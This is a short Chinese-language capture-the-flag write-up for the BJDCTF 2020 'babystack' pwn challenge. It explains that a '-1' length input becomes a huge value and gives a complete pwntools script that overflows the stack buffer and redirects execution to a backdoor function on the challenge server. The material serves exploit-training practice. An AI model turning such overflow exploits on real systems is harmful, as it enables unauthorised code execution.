当前位置: 首页 > article >正文

[BJDCTF 2020]babystack-好久不见9

article 2024/11/5 12:11:44

64位,开启了nx保护

buf[12]的大小是10

后门

‘-1’是极大的

from pwn import *
r = remote("node4.anna.nssctf.cn",28705)
r.recvuntil(b"your name:")
r.sendline("-1")
r.recvuntil(b"name?")
payload = b'M' * (0x10 + 8) + p64(0x04006E6)
r.sendline(payload)
r.interactive()


http://www.kler.cn/a/377698.html

相关文章:

  • C# 中 发送HTTP请求 实现Ajax功能
  • Echarts环形图引线设置
  • 推荐FileLink数据跨网摆渡系统 — 安全、高效的数据传输解决方案
  • Python酷库之旅-第三方库Pandas(193)
  • CSS常见适配布局方式
  • OpenAI 提示工程指南详解
  • Web API中的requestAnimationFrame
  • 基于深度学习的自主飞行器导航
  • RHCE——笔记
  • FPGA技术优势
  • Linux——Ubuntu的基础操作
  • .tags > * 直接子选择器的使用
  • Docker篇(安装容器)
  • 力扣每日一题 3226. 使两个整数相等的位更改次数
  • 建设NFS服务器并实现文件共享
  • 校园社团信息管理:Spring Boot技术的应用与挑战
  • 【系统设计】让 Java “动起来”:动态语言与静态语言的比较及 DSL 实现
  • 继承【C++】
  • Linux入门(2)
  • OpenAI Swarm:多智能体编排框架
  • mysql通过sql语句手动关闭连接
  • rnn/lstm
  • java的批量update
  • SQL,力扣题目1549,每件商品的最新订单【窗口函数】
  • 实现GUI界面中的logo图片的编码与隐藏
  • 基于vue3和elementPlus的el-tree组件,实现树结构穿梭框,支持数据回显和懒加载